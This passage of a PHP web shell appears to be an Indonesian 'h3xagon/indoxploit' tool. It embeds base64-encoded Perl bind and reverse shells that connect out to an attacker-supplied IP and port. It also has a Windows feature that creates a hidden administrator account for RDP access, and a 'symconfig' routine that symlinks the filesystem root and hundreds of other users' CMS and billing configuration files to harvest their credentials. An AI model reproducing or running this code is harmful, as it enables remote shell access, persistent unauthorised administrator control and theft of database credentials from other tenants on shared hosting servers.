	$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
	if(isset($_POST['sub_bp'])) {
		$f_bp = fopen("/tmp/bp.pl", "w");
		fwrite($f_bp, base64_decode($bind_port_p));
		fclose($f_bp);

		$port = $_POST['port_bind'];
		$out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
		sleep(1);
		echo "<pre>".$out."
".exe("ps aux | grep bp.pl")."</pre>";
		unlink("/tmp/bp.pl");
	}
	$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
	if(isset($_POST['sub_bc'])) {
		$f_bc = fopen("/tmp/bc.pl", "w");
		fwrite($f_bc, base64_decode($bind_connect_p));
		fclose($f_bc);

		$ipbc = $_POST['ip_bc'];
		$port = $_POST['port_bc'];
		$out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
		sleep(1);
		echo "<pre>".$out."
".exe("ps aux | grep bc.pl")."</pre>";
		unlink("/tmp/bc.pl");
	}
} elseif($_GET['do'] == 'krdp_shell') {
	if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
		if($_POST['create']) {
			$user = htmlspecialchars($_POST['user']);
			$pass = htmlspecialchars($_POST['pass']);
			if(preg_match("/$user/", exe("net user"))) {
				echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
			} else {
				$add_user   = exe("net user $user $pass /add");
    			$add_groups1 = exe("net localgroup Administrators $user /add");
    			$add_groups2 = exe("net localgroup Administrator $user /add");
    			$add_groups3 = exe("net localgroup Administrateur $user /add");
    			echo "[ RDP ACCOUNT INFO ]<br>
    			------------------------------<br>
    			IP: <font color=lime>".$ip."</font><br>
    			Username: <font color=lime>$user</font><br>
    			Password: <font color=lime>$pass</font><br>
    			------------------------------<br><br>
    			[ STATUS ]<br>
    			------------------------------<br>
    			";
    			if($add_user) {
    				echo "[add user] -> <font color='lime'>Berhasil</font><br>";
    			} else {
    				echo "[add user] -> <font color='red'>Gagal</font><br>";
    			}
    			if($add_groups1) {
        			echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
    			} elseif($add_groups2) {
        		    echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
    			} elseif($add_groups3) { 
        		    echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
    			} else {
    				echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
    			}
    			echo "------------------------------<br>";
			}
		} elseif($_POST['s_opsi']) {
			$user = htmlspecialchars($_POST['r_user']);
			if($_POST['opsi'] == '1') {
				$cek = exe("net user $user");
				echo "Checking username <font color=lime>$user</font> ....... ";
				if(preg_match("/$user/", $cek)) {
					echo "[ <font color=lime>Sudah ada</font> ]<br>
					------------------------------<br><br>
					<pre>$cek</pre>";
				} else {
					echo "[ <font color=red>belum ada</font> ]";
				}
			} elseif($_POST['opsi'] == '2') {
				$cek = exe("net user $user indoxploit");
				if(preg_match("/$user/", exe("net user"))) {
					echo "[change password: <font color=lime>indoxploit</font>] -> ";
					if($cek) {
						echo "<font color=lime>Berhasil</font>";
					} else {
						echo "<font color=red>Gagal</font>";
					}
				} else {
					echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
				}
			} elseif($_POST['opsi'] == '3') {
				$cek = exe("net user $user /DELETE");
				if(preg_match("/$user/", exe("net user"))) {
					echo "[remove user: <font color=lime>$user</font>] -> ";
					if($cek) {
						echo "<font color=lime>Berhasil</font>";
					} else {
						echo "<font color=red>Gagal</font>";
					}
				} else {
					echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
				}
			} else {
				//
			}
		} else {
			echo "-- Create RDP --<br>
			<form method='post'>
			<input type='text' name='user' placeholder='username' value='H3xagon' required>
			<input type='text' name='pass' placeholder='password' value='dennyseptian123!' required>
			<input type='submit' name='create' value='>>'>
			</form>
			-- Option --<br>
			<form method='post'>
			<input type='text' name='r_user' placeholder='username' required>
			<select name='opsi'>
			<option value='1'>Cek Username</option>
			<option value='2'>Ubah Password</option>
			<option value='3'>Hapus Username</option>
			</select>
			<input type='submit' name='s_opsi' value='>>'>
			</form>
			";
		}
	} else {
		echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
	}
} elseif ($_GET['do'] == 'symconfig') {
                                                        if (strtolower(substr(PHP_OS, 0, 3)) == "win") {
                                                            echo '<script>alert("Skid this won\'t work on Windows")</script>';
                                                            exit;
                                                        } else {
                                                            if ($_POST["m"] && !$_POST["passwd"] == "") {
                                                                @mkdir("h3xagon_symconf", 0777);
                                                                @chdir("h3xagon_symconf");
                                                                @symlink("/", "root");
                                                                $htaccess = "Options Indexes FollowSymLinks
DirectoryIndex h3xagon.htm
AddType text/plain .php 
AddHandler text/plain .php
Satisfy Any";
                                                                @file_put_contents(".htaccess", $htaccess);
                                                                $etc_passwd = $_POST["passwd"];
                                                                $etc_passwd = explode("
", $etc_passwd);
                                                                foreach ($etc_passwd as $passwd) {
                                                                    $pawd = explode(":", $passwd);
                                                                    $user = $pawd[0];
                                                                    @symlink('/', 'h3xagon_symconf/root');
                                                                    @symlink('/home/' . $user . '/public_html/vb/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home/' . $user . '/public_html/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home/' . $user . '/public_html/forum/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home/' . $user . '/public_html/forums/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home/' . $user . '/public_html/cc/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home/' . $user . '/public_html/inc/config.php', $user . '-MyBB.txt');
                                                                    @symlink('/home/' . $user . '/public_html/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home/' . $user . '/public_html/shop/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home/' . $user . '/public_html/os/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home/' . $user . '/public_html/oscom/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home/' . $user . '/public_html/products/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home/' . $user . '/public_html/cart/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home/' . $user . '/public_html/inc/conf_global.php', $user . '-IPB.txt');
                                                                    @symlink('/home/' . $user . '/public_html/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home/' . $user . '/public_html/wp/test/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home/' . $user . '/public_html/portal/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home/' . $user . '/public_html/site/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home/' . $user . '/public_html/wp/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home/' . $user . '/public_html/WP/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home/' . $user . '/public_html/news/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home/' . $user . '/public_html/wordpress/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home/' . $user . '/public_html/test/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home/' . $user . '/public_html/demo/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home/' . $user . '/public_html/home/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home/' . $user . '/public_html/v1/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home/' . $user . '/public_html/v2/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home/' . $user . '/public_html/press/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home/' . $user . '/public_html/new/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home/' . $user . '/public_html/blogs/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home/' . $user . '/public_html/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home/' . $user . '/public_html/blog/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home/' . $user . '/public_html/submitticket.php', $user . '-^WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/cms/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home/' . $user . '/public_html/beta/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home/' . $user . '/public_html/portal/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home/' . $user . '/public_html/site/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home/' . $user . '/public_html/main/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home/' . $user . '/public_html/home/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home/' . $user . '/public_html/demo/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home/' . $user . '/public_html/test/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home/' . $user . '/public_html/v1/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home/' . $user . '/public_html/v2/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home/' . $user . '/public_html/joomla/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home/' . $user . '/public_html/new/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home/' . $user . '/public_html/WHMCS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/whmcs1/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/WHMC/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Whmc/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/whmc/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/WHM/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/HOST/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Host/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/host/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/SUPPORTES/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Supportes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/supportes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/domains/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/domain/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Hosting/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/HOSTING/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/hosting/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/CART/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Cart/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/cart/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/ORDER/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/CLIENT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Client/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/client/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/CLIENTAREA/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Clientarea/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/clientarea/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/SUPPORT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Support/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/support/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/BILLING/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Billing/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/billing/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/BUY/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Buy/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/buy/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/MANAGE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Manage/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/manage/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/CLIENTSUPPORT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/ClientSupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Clientsupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/clientsupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/CHECKOUT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Checkout/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/checkout/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/BILLINGS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/BASKET/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Basket/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/basket/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/SECURE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Secure/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/secure/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/SALES/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Sales/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/sales/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/BILL/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Bill/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/bill/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/PURCHASE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Purchase/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/purchase/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/ACCOUNT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Account/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/account/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/USER/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/User/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/user/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/CLIENTS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Clients/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/clients/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/BILLINGS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/MY/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/My/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/my/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/secure/whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/panel/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/clientes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/cliente/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/support/order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home/' . $user . '/public_html/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home/' . $user . '/public_html/boxbilling/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home/' . $user . '/public_html/box/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home/' . $user . '/public_html/host/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Host/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home/' . $user . '/public_html/supportes/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home/' . $user . '/public_html/support/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home/' . $user . '/public_html/hosting/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home/' . $user . '/public_html/cart/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home/' . $user . '/public_html/order/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home/' . $user . '/public_html/client/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home/' . $user . '/public_html/clients/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home/' . $user . '/public_html/cliente/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home/' . $user . '/public_html/clientes/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home/' . $user . '/public_html/billing/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home/' . $user . '/public_html/billings/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home/' . $user . '/public_html/my/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home/' . $user . '/public_html/secure/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home/' . $user . '/public_html/support/order/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home/' . $user . '/public_html/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home/' . $user . '/public_html/products/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home/' . $user . '/public_html/cart/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home/' . $user . '/public_html/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home/' . $user . '/public_html/host/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home/' . $user . '/public_html/Host/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home/' . $user . '/public_html/supportes/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home/' . $user . '/public_html/support/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home/' . $user . '/public_html/cart/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home/' . $user . '/public_html/order/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home/' . $user . '/public_html/client/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home/' . $user . '/public_html/clients/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home/' . $user . '/public_html/cliente/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home/' . $user . '/public_html/clientes/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home/' . $user . '/public_html/my/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home/' . $user . '/public_html/secure/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home/' . $user . '/public_html/support/order/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home/' . $user . '/.my.cnf', $user . '-Cpanel.txt');
                                                                    @symlink('/home/' . $user . '/public_html/po-content/config.php', $user . '-Popoji.txt');
                                                                    //Home1
                                                                    @symlink('/home1/' . $user . '/public_html/vb/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/forum/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/forums/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/cc/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/inc/config.php', $user . '-MyBB.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/shop/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/os/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/oscom/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/products/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/cart/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/inc/conf_global.php', $user . '-IPB.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/wp/test/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/blog/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/beta/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/portal/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/site/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/wp/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/WP/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/news/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/wordpress/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/test/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/demo/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/home/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/v1/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/v2/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/press/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/new/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/blogs/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/blog/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/submitticket.php', $user . '-^WHMCS.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/cms/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/beta/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/portal/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/site/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/main/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/home/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/demo/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/test/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home1/' . $user . '/public_html/v1/configuration.php', $user . '-Joomla.txt');
